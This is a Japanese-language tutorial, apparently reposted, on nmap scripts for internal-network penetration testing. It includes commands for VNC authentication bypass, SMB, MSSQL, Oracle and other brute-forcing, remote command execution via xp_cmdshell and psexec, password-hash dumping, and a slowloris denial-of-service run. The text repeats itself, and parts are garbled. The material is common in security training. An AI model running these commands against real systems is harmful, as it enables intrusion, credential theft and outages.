nmapスクリプト使用概要
5686 ワード
nmapの基本的な紹介と基本的な使い方は、黒雲知識ベースですでに提出されており、詳細については、この文書では説明しません.具体的なリンク:http://drops.wooyun.org/tips/2002
本文は主にnmapの多くのスクリプトの使用を説明して、内網が浸透する時特に使いやすいです.
0 x 01 nmapスクリプト別スキャン
nmapスクリプトは主に以下のクラスに分けられ、スキャン時に必要に応じて--script=カテゴリを設定するという方法で比較的一般的なスキャンを行うことができます.
部分的にスクリーンショットを使用:
(1)
認証証明書の処理(認証を迂回)を担当するスクリプトは、検出部として弱いパスワードを適用することもできます.
(2)
暴力的な解読方法を提供する データベース、smb、snmpなどに対して簡単なパスワードの暴力的な推測を行うことができます
(3)
デフォルトのスクリプトスキャンは、主に様々なアプリケーションサービスの情報を収集し、収集した後、特定のサービスに対して攻撃を行うことができます.
(4)
一般的な脆弱性の有無を確認
(5)
ローカルエリアネットワーク内でより多くのサービスのオープン状況を確認
(6)
サードパーティのデータベースまたはリソース、例えばwhois解析
0 x 02 nmapアプリケーションサービス別スキャン
(1)vncスキャン:
vnc bypassのチェック
1
vnc認証方式の確認
1
vnc情報の取得
1
(2)smbスキャン:
smb解読
1
smb辞書解読
1
smbはいくつかの深刻な漏れが知られている.
1
共有ディレクトリの表示
1
ホストの機密情報をクエリーします(注意:nmap_serviceをダウンロードする必要があります)
1
セッションの表示
1
システム情報
1
(3)Mssqlスキャン:
mssqlユーザー名とパスワードの推測
1
xp_cmdshell実行コマンド
1
dumphash値
1
(4)Mysqlスキャン:
root空パスワードのスキャン
1
すべてのmysqlユーザーをリスト
1
同じアプリケーションのすべてのスクリプトスキャンをサポート
1
(5)Oracleスキャン:
oracle sidスキャン
1
oracle弱いパスワード解読
1
(6)他の使いやすいスクリプト
(7)頼りにならないシナリオ:
vnc-brute 回数が多くなると接続が禁止されます
pcanywhere-brute 同上
0x03 学会スクリプト解析
nmapではスクリプトがわかりにくいわけではありませんので、使用時に原理が分からなければ利用スクリプトを直接見ることもできますし、その中のいくつかのパラメータを修正して自分で使うこともできます.
例:
Oracleの弱いパスワードの解読について:
呼び出しプロシージャ:oracle-brute.nse>>oracle-default-accounts.lst
まず、解読スクリプトを呼び出します.
スクリプト内の辞書の場所に応じてデフォルトの辞書を表示します.もちろん、解読した文字を自分で追加したり、スクリプトやパラメータを変更して解読辞書を変更したりすることもできます.
本文は主にnmapの多くのスクリプトの使用を説明して、内網が浸透する時特に使いやすいです.
0 x 01 nmapスクリプト別スキャン
nmapスクリプトは主に以下のクラスに分けられ、スキャン時に必要に応じて--script=カテゴリを設定するという方法で比較的一般的なスキャンを行うことができます.
auth: ( )
broadcast: , dhcp/dns/sqlserver
brute: , http/snmp
default: -sC -A ,
discovery: , SMB 、SNMP
dos:
exploit:
external: , whois
fuzzer: , , intrusive: , IDS/IPS
malware: 、
safe: intrusive ,
version: (Version Detection)
vuln: (Vulnerability), MS08_067
部分的にスクリーンショットを使用:
(1)
nmap --script=auth 192.168.137.*
認証証明書の処理(認証を迂回)を担当するスクリプトは、検出部として弱いパスワードを適用することもできます.
(2)
nmap --script=brute 192.168.137.*
暴力的な解読方法を提供する データベース、smb、snmpなどに対して簡単なパスワードの暴力的な推測を行うことができます
(3)
nmap --script=default 192.168.137.*
または nmap -sC 192.168.137.*
デフォルトのスクリプトスキャンは、主に様々なアプリケーションサービスの情報を収集し、収集した後、特定のサービスに対して攻撃を行うことができます.
(4)
nmap --script=vuln 192.168.137.*
一般的な脆弱性の有無を確認
(5)
nmap -n -p445 --script=broadcast 192.168.137.4
ローカルエリアネットワーク内でより多くのサービスのオープン状況を確認
(6)
nmap --script external 202.103.243.110
サードパーティのデータベースまたはリソース、例えばwhois解析
0 x 02 nmapアプリケーションサービス別スキャン
(1)vncスキャン:
vnc bypassのチェック
1
nmap --script=realvnc-auth-bypass 192.168.137.4
vnc認証方式の確認
1
nmap --script=vnc-auth 192.168.137.4
vnc情報の取得
1
nmap --script=vnc-info 192.168.137.4
(2)smbスキャン:
smb解読
1
nmap --script=smb-brute.nse 192.168.137.4
smb辞書解読
1
nmap --script=smb-brute.nse --script-args=userdb=
/var/passwd
,passdb=
/var/passwd
192.168.137.4
smbはいくつかの深刻な漏れが知られている.
1
nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.4
共有ディレクトリの表示
1
nmap -p 445 --script smb-
ls
--script-args ‘share=e$,path=\,smbuser=
test
,smbpass=
test
’ 192.168.137.4
ホストの機密情報をクエリーします(注意:nmap_serviceをダウンロードする必要があります)
1
nmap -p 445 -n –script=smb-psexec --script-args= smbuser=
test
,smbpass=
test
192.168.137.4
セッションの表示
1
nmap -n -p445 --script=smb-enum-sessions.nse --script-args=smbuser=
test
,smbpass=
test
192.168.137.4
システム情報
1
nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=
test
,smbpass=
test
192.168.137.4
(3)Mssqlスキャン:
mssqlユーザー名とパスワードの推測
1
nmap -p1433 --script=ms-sql-brute --script-args=userdb=
/var/passwd
,passdb=
/var/passwd
192.168.137.4
xp_cmdshell実行コマンド
1
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=
"net user"
192.168.137.4
dumphash値
1
nmap -p 1433 --script ms-sql-dump-hashes.nse --script-args mssql.username=sa,mssql.password=sa 192.168.137.4
(4)Mysqlスキャン:
root空パスワードのスキャン
1
nmap -p3306 --script=mysql-empty-password.nse 192.168.137.4
すべてのmysqlユーザーをリスト
1
nmap -p3306 --script=mysql-
users
.nse --script-args=mysqluser=root 192.168.137.4
同じアプリケーションのすべてのスクリプトスキャンをサポート
1
nmap --script=mysql-* 192.168.137.4
(5)Oracleスキャン:
oracle sidスキャン
1
nmap --script=oracle-sid-brute -p 1521-1560 192.168.137.5
oracle弱いパスワード解読
1
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL,userdb=
/var/passwd
,passdb=
/var/passwd
192.168.137.5
(6)他の使いやすいスクリプト
nmap --script=broadcast-netbios-master-browser 192.168.137.4
nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4 rsync
nmap --script informix-brute -p 9088 192.168.137.4 informix
nmap -p 5432 --script pgsql-brute 192.168.137.4 pgsql
nmap -sU --script snmp-brute 192.168.137.4 snmp
nmap -sV --script=telnet-brute 192.168.137.4 telnet
nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' jboss autopwn
nmap --script=http-methods.nse 192.168.137.4 http
nmap --script http-slowloris --max-parallelism 400 192.168.137.4 dos , 'half-HTTP' connections
nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4
(7)頼りにならないシナリオ:
vnc-brute 回数が多くなると接続が禁止されます
pcanywhere-brute 同上
0x03 学会スクリプト解析
nmapではスクリプトがわかりにくいわけではありませんので、使用時に原理が分からなければ利用スクリプトを直接見ることもできますし、その中のいくつかのパラメータを修正して自分で使うこともできます.
例:
Oracleの弱いパスワードの解読について:
呼び出しプロシージャ:oracle-brute.nse>>oracle-default-accounts.lst
まず、解読スクリプトを呼び出します.
スクリプト内の辞書の場所に応じてデフォルトの辞書を表示します.もちろん、解読した文字を自分で追加したり、スクリプトやパラメータを変更して解読辞書を変更したりすることもできます.